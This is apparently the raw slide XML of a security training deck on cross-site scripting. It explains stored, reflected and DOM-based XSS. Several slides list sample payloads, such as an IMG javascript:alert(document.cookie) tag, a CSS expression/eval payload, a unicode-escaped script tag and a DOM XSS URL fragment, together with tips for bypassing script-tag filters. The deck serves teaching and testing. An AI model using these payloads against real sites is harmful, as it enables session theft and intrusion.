                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="81"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3786447"/>
            <a:ext cx="9143999" cy="2094523"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3650" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>jim@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3650" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>manicode.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3650" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="532813952"/>
      </p:ext>
    </p:extLst>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for Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="1526944"/>
            <a:ext cx="8686800" cy="1338828"/>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Each input should be tested to see</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if data gets rendered back to the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="560070" indent="-285750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Break out of another tag by inserting "&gt; before the malicious script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="560070" indent="-285750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"tag-hunting" filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6835420" y="635329"/>
            <a:ext cx="1465134" cy="1465129"/>
            <a:chOff x="4942490" y="698993"/>
            <a:chExt cx="1465134" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="Group 12"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4942490" y="698993"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="24" name="Oval 23"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="tx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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="14" name="Group 13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5266100" y="1062931"/>
              <a:ext cx="881925" cy="736092"/>
              <a:chOff x="1620838" y="927100"/>
              <a:chExt cx="6873875" cy="5737225"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1620838" y="1984375"/>
                <a:ext cx="4679950" cy="4679950"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12999 w 13000"/>
                  <a:gd name="T1" fmla="*/ 0 h 13000"/>
                  <a:gd name="T2" fmla="*/ 0 w 13000"/>
                  <a:gd name="T3" fmla="*/ 0 h 13000"/>
                  <a:gd name="T4" fmla="*/ 0 w 13000"/>
                  <a:gd name="T5" fmla="*/ 12999 h 13000"/>
                  <a:gd name="T6" fmla="*/ 12999 w 13000"/>
                  <a:gd name="T7" fmla="*/ 12999 h 13000"/>
                  <a:gd name="T8" fmla="*/ 12999 w 13000"/>
                  <a:gd name="T9" fmla="*/ 6186 h 13000"/>
                  <a:gd name="T10" fmla="*/ 11343 w 13000"/>
                  <a:gd name="T11" fmla="*/ 7843 h 13000"/>
                  <a:gd name="T12" fmla="*/ 11343 w 13000"/>
                  <a:gd name="T13" fmla="*/ 11343 h 13000"/>
                  <a:gd name="T14" fmla="*/ 1656 w 13000"/>
                  <a:gd name="T15" fmla="*/ 11343 h 13000"/>
                  <a:gd name="T16" fmla="*/ 1656 w 13000"/>
                  <a:gd name="T17" fmla="*/ 1656 h 13000"/>
                  <a:gd name="T18" fmla="*/ 11343 w 13000"/>
                  <a:gd name="T19" fmla="*/ 1656 h 13000"/>
                  <a:gd name="T20" fmla="*/ 12999 w 13000"/>
                  <a:gd name="T21" fmla="*/ 0 h 1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00" h="13000">
                    <a:moveTo>
                      <a:pt x="12999" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12999"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12999" y="12999"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12999" y="6186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11343" y="7843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11343" y="11343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1656" y="11343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1656" y="1656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11343" y="1656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12999"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
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2476500" y="927100"/>
                <a:ext cx="6018213" cy="4883150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 16718 w 16719"/>
                  <a:gd name="T1" fmla="*/ 1813 h 13563"/>
                  <a:gd name="T2" fmla="*/ 14874 w 16719"/>
                  <a:gd name="T3" fmla="*/ 0 h 13563"/>
                  <a:gd name="T4" fmla="*/ 4969 w 16719"/>
                  <a:gd name="T5" fmla="*/ 9906 h 13563"/>
                  <a:gd name="T6" fmla="*/ 1844 w 16719"/>
                  <a:gd name="T7" fmla="*/ 6782 h 13563"/>
                  <a:gd name="T8" fmla="*/ 0 w 16719"/>
                  <a:gd name="T9" fmla="*/ 8593 h 13563"/>
                  <a:gd name="T10" fmla="*/ 4969 w 16719"/>
                  <a:gd name="T11" fmla="*/ 13562 h 13563"/>
                  <a:gd name="T12" fmla="*/ 4969 w 16719"/>
                  <a:gd name="T13" fmla="*/ 13531 h 13563"/>
                  <a:gd name="T14" fmla="*/ 4969 w 16719"/>
                  <a:gd name="T15" fmla="*/ 13562 h 13563"/>
                  <a:gd name="T16" fmla="*/ 16718 w 16719"/>
                  <a:gd name="T17" fmla="*/ 1813 h 13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19" h="13563">
                    <a:moveTo>
                      <a:pt x="16718" y="1813"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14874" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4969" y="9906"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1844" y="6782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4969" y="13562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4969" y="13531"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4969" y="13562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16718" y="181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16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="3044548"/>
            <a:ext cx="8229600" cy="909480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;IMG SRC="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;p style="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>left:expression</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>('alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>)'))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>\u003Cscript\u003E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="4587436"/>
            <a:ext cx="8686800" cy="707886"/>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May not require tags if the input is inserted into an existing</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript routine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;- DOM XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5400143"/>
            <a:ext cx="8229600" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;SCRIPT&gt; &lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>userdata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> %&gt; &lt;/SCRIPT&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2497152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37"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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="25" presetID="37"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900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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8"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DOM-Based XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1368425"/>
            <a:ext cx="8229600" cy="389255"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.com/index.jsp#name=&lt;script&gt;alert(document.cookie)&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3379115" y="449725"/>
            <a:ext cx="5434534" cy="830997"/>
            <a:chOff x="4491894" y="2173273"/>
            <a:chExt cx="5434534" cy="830997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5981710" y="2173273"/>
              <a:ext cx="3944718" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:srgbClr val="DB3D16"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>In DOM XSS is the attack is stopped client-side. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="DB3D16"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>During Stored and Reflective XSS the attack is injected server-side. </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="Straight Connector 10"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4491894" y="2657364"/>
              <a:ext cx="1489816" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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15" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5117680"/>
            <a:ext cx="8686800" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="18288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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page.htm?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=Joe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Group 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4607346" y="4985169"/>
            <a:ext cx="636753" cy="636751"/>
            <a:chOff x="3285453" y="1431558"/>
            <a:chExt cx="1465134" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Oval 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3285453" y="1431558"/>
              <a:ext cx="1465134" cy="1465129"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="tx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32" name="Oval 31"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3373277" y="1519470"/>
              <a:ext cx="1289487" cy="1289304"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx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a:r>
                <a:rPr lang="en-US" sz="1400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>OK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5580766"/>
            <a:ext cx="8686800" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
